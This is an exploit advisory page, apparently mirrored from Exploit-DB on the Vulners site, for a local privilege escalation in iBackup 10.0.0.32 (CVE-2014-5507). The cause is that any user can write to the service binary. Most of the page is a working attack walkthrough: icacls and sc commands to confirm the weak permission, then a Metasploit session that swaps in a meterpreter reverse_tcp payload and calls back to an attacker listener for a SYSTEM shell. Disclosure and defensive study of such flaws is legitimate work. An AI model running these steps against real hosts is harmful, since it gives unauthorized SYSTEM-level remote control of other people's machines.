Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

iBackup 10.0.0.32 - Local Privilege Escalation

🗓️ 22 Oct 2014 00:00:00Reported by Glafkos CharalambousType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

iBackup version 10.0.0.32 allows local privilege escalation by exploiting weak file permissions, enabling an attacker to execute arbitrary code with SYSTEM privileges upon service restart or system reboot

Related
Code
ReporterTitlePublishedViews
Family
0day.today		iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability
22 Oct 201400:00
zdt
CVE		CVE-2014-5507
3 Nov 201416:00
cve
Cvelist		CVE-2014-5507
3 Nov 201416:00
cvelist
EUVD		EUVD-2014-5394
7 Oct 202500:30
euvd
exploitpack		iBackup 10.0.0.32 - Local Privilege Escalation
22 Oct 201400:00
exploitpack
NVD		CVE-2014-5507
3 Nov 201416:55
nvd
OpenVAS		iBackup Local Privilege Escalation Vulnerability - Windows
1 Dec 201400:00
openvas
Prion		Design/Logic Flaw
3 Nov 201416:55
prion
seebug.org		iBackup 10.0.0.32 - Local Privilege Escalation
13 Nov 201400:00
seebug
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507


Vulnerability Details
There are weak permissions for IBackupWindows default installation where everyone is allowed to change 
the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.


C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



msf exploit(service_permissions) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)



msf exploit(service_permissions) > show options 

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.100    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(service_permissions) > exploit 

[*] Started reverse handler on 192.168.0.100:4444 
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)

Upon Reboot or Service Restart

[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 2...

msf exploit(service_permissions) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC  192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Oct 2014 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 27.2
EPSS0.01131
ibackuplocal privilege escalationweak permissionssystem privilegesexploitvulnerabilityservice permissions
34